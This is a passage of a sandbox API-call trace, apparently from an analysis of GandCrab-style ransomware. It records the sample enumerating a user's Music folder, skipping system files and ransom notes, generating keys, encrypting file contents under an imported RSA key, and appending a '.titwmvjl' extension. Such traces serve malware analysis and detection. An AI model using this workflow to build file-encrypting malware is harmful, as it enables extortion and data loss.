flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.968] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\OxXKE7MmkWg9dzN.mp3.titwmvjl") returned 70 [0092.968] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\OxXKE7MmkWg9dzN.mp3") returned 61 [0092.968] lstrlenW (lpString=".mp3") returned 4 [0092.968] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.968] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp3 ") returned 5 [0092.969] lstrcmpiW (lpString1=".mp3", lpString2=".titwmvjl") returned -1 [0092.969] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.969] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\OxXKE7MmkWg9dzN.mp3") returned 61 [0092.969] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\OxXKE7MmkWg9dzN.mp3") returned 61 [0092.969] lstrcmpiW (lpString1="OxXKE7MmkWg9dzN.mp3", lpString2="desktop.ini") returned 1 [0092.969] lstrcmpiW (lpString1="OxXKE7MmkWg9dzN.mp3", lpString2="autorun.inf") returned 1 [0092.969] lstrcmpiW (lpString1="OxXKE7MmkWg9dzN.mp3", lpString2="ntuser.dat") returned 1 [0092.969] lstrcmpiW (lpString1="OxXKE7MmkWg9dzN.mp3", lpString2="iconcache.db") returned 1 [0092.969] lstrcmpiW (lpString1="OxXKE7MmkWg9dzN.mp3", lpString2="bootsect.bak") returned 1 [0092.969] lstrcmpiW (lpString1="OxXKE7MmkWg9dzN.mp3", lpString2="boot.ini") returned 1 [0092.969] lstrcmpiW (lpString1="OxXKE7MmkWg9dzN.mp3", lpString2="ntuser.dat.log") returned 1 [0092.969] lstrcmpiW (lpString1="OxXKE7MmkWg9dzN.mp3", lpString2="thumbs.db") returned -1 [0092.969] lstrcmpiW (lpString1="OxXKE7MmkWg9dzN.mp3", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0092.969] lstrcmpiW (lpString1="OxXKE7MmkWg9dzN.mp3", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0092.969] lstrcmpiW (lpString1="OxXKE7MmkWg9dzN.mp3", lpString2="KRAB-DECRYPT.html") returned 1 [0092.969] lstrcmpiW (lpString1="OxXKE7MmkWg9dzN.mp3", lpString2="CRAB-DECRYPT.html") returned 1 [0092.969] lstrcmpiW (lpString1="OxXKE7MmkWg9dzN.mp3", lpString2="KRAB-DECRYPT.txt") returned 1 [0092.969] lstrcmpiW (lpString1="OxXKE7MmkWg9dzN.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0092.969] lstrcmpiW (lpString1="OxXKE7MmkWg9dzN.mp3", lpString2="ntldr") returned 1 [0092.969] lstrcmpiW (lpString1="OxXKE7MmkWg9dzN.mp3", lpString2="NTDETECT.COM") returned 1 [0092.969] lstrcmpiW (lpString1="OxXKE7MmkWg9dzN.mp3", lpString2="Bootfont.bin") returned 1 [0092.969] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\OxXKE7MmkWg9dzN.mp3") returned 61 [0092.969] lstrlenW (lpString=".mp3") returned 4 [0092.969] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.969] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0092.969] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.970] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.970] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\OxXKE7MmkWg9dzN.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\oxxke7mmkwg9dzn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0092.970] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.970] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0092.971] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.971] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.971] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0092.971] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.972] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.972] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.972] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0092.972] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.972] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.972] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.972] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.972] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0092.972] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.973] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.973] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.973] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0092.973] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.973] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.973] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.973] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.973] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0092.974] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.974] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5036f8) returned 1 [0092.974] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.974] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0092.974] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.974] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0092.974] GetLastError () returned 0x0 [0092.974] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.974] CryptDestroyKey (hKey=0x5036f8) returned 1 [0092.975] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.975] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.975] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.975] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0092.975] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.975] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5036f8) returned 1 [0092.975] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.975] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0092.975] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.976] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0092.976] GetLastError () returned 0x0 [0092.976] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.976] CryptDestroyKey (hKey=0x5036f8) returned 1 [0092.976] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.976] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.976] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0092.976] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0092.977] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0xeec0, lpOverlapped=0x0) returned 1 [0092.990] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff1140, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.990] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xeec0, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0xeec0, lpOverlapped=0x0) returned 1 [0093.076] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.076] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0093.150] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.155] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.156] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.156] CloseHandle (hObject=0x2b4) returned 1 [0093.157] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\OxXKE7MmkWg9dzN.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\oxxke7mmkwg9dzn.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\OxXKE7MmkWg9dzN.mp3.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\oxxke7mmkwg9dzn.mp3.titwmvjl"), dwFlags=0x1) returned 1 [0093.158] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.158] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.158] lstrcmpW (lpString1="RNgrw.m4a", lpString2=".") returned 1 [0093.158] lstrcmpW (lpString1="RNgrw.m4a", lpString2="..") returned 1 [0093.158] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\", lpString2="RNgrw.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\RNgrw.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\RNgrw.m4a" [0093.158] lstrlenW (lpString=".titwmvjl") returned 9 [0093.158] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\RNgrw.m4a") returned 51 [0093.158] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.158] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\RNgrw.m4a.titwmvjl") returned 60 [0093.158] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\RNgrw.m4a") returned 51 [0093.159] lstrlenW (lpString=".m4a") returned 4 [0093.159] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.159] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".m4a ") returned 5 [0093.159] lstrcmpiW (lpString1=".m4a", lpString2=".titwmvjl") returned -1 [0093.159] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.159] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\RNgrw.m4a") returned 51 [0093.159] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\RNgrw.m4a") returned 51 [0093.159] lstrcmpiW (lpString1="RNgrw.m4a", lpString2="desktop.ini") returned 1 [0093.159] lstrcmpiW (lpString1="RNgrw.m4a", lpString2="autorun.inf") returned 1 [0093.159] lstrcmpiW (lpString1="RNgrw.m4a", lpString2="ntuser.dat") returned 1 [0093.159] lstrcmpiW (lpString1="RNgrw.m4a", lpString2="iconcache.db") returned 1 [0093.159] lstrcmpiW (lpString1="RNgrw.m4a", lpString2="bootsect.bak") returned 1 [0093.159] lstrcmpiW (lpString1="RNgrw.m4a", lpString2="boot.ini") returned 1 [0093.159] lstrcmpiW (lpString1="RNgrw.m4a", lpString2="ntuser.dat.log") returned 1 [0093.159] lstrcmpiW (lpString1="RNgrw.m4a", lpString2="thumbs.db") returned -1 [0093.159] lstrcmpiW (lpString1="RNgrw.m4a", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0093.159] lstrcmpiW (lpString1="RNgrw.m4a", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0093.159] lstrcmpiW (lpString1="RNgrw.m4a", lpString2="KRAB-DECRYPT.html") returned 1 [0093.159] lstrcmpiW (lpString1="RNgrw.m4a", lpString2="CRAB-DECRYPT.html") returned 1 [0093.160] lstrcmpiW (lpString1="RNgrw.m4a", lpString2="KRAB-DECRYPT.txt") returned 1 [0093.160] lstrcmpiW (lpString1="RNgrw.m4a", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.160] lstrcmpiW (lpString1="RNgrw.m4a", lpString2="ntldr") returned 1 [0093.160] lstrcmpiW (lpString1="RNgrw.m4a", lpString2="NTDETECT.COM") returned 1 [0093.160] lstrcmpiW (lpString1="RNgrw.m4a", lpString2="Bootfont.bin") returned 1 [0093.160] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\RNgrw.m4a") returned 51 [0093.160] lstrlenW (lpString=".m4a") returned 4 [0093.160] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.160] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".m4a ") returned 5 [0093.160] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.160] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.160] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\RNgrw.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\rngrw.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0093.161] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.161] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0093.162] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.162] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.162] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.162] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.162] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.162] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.162] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0093.163] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.163] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.163] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.163] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.163] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.163] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.164] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.164] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.164] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0093.164] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.164] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.164] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.164] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.164] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.165] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.165] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503378) returned 1 [0093.165] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.165] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.165] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.165] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.166] GetLastError () returned 0x0 [0093.166] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.166] CryptDestroyKey (hKey=0x503378) returned 1 [0093.166] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.166] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.166] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.166] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.167] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.167] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5038f8) returned 1 [0093.167] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.167] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.167] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.167] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.167] GetLastError () returned 0x0 [0093.168] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.168] CryptDestroyKey (hKey=0x5038f8) returned 1 [0093.168] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.170] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.170] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0093.170] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0093.170] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x1744c, lpOverlapped=0x0) returned 1 [0093.180] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffe8bb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.180] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1744c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x1744c, lpOverlapped=0x0) returned 1 [0093.182] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.182] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0093.183] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.187] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.187] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.188] CloseHandle (hObject=0x2b4) returned 1 [0093.188] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\RNgrw.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\rngrw.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\RNgrw.m4a.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\rngrw.m4a.titwmvjl"), dwFlags=0x1) returned 1 [0093.189] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.189] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.189] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0093.189] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0093.189] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\TITWMVJL-DECRYPT.txt" [0093.189] lstrlenW (lpString=".titwmvjl") returned 9 [0093.189] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\TITWMVJL-DECRYPT.txt") returned 62 [0093.189] VirtualAlloc (lpAddress=0x0, dwSize=0xbc, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.190] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 71 [0093.195] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\TITWMVJL-DECRYPT.txt") returned 62 [0093.195] lstrlenW (lpString=".txt") returned 4 [0093.195] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.195] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0093.195] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0093.195] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.195] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\TITWMVJL-DECRYPT.txt") returned 62 [0093.195] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\TITWMVJL-DECRYPT.txt") returned 62 [0093.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0093.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0093.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0093.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0093.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0093.195] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0093.196] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0093.196] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0093.196] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.196] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.196] lstrcmpW (lpString1="uPotTL6igW.wav", lpString2=".") returned 1 [0093.196] lstrcmpW (lpString1="uPotTL6igW.wav", lpString2="..") returned 1 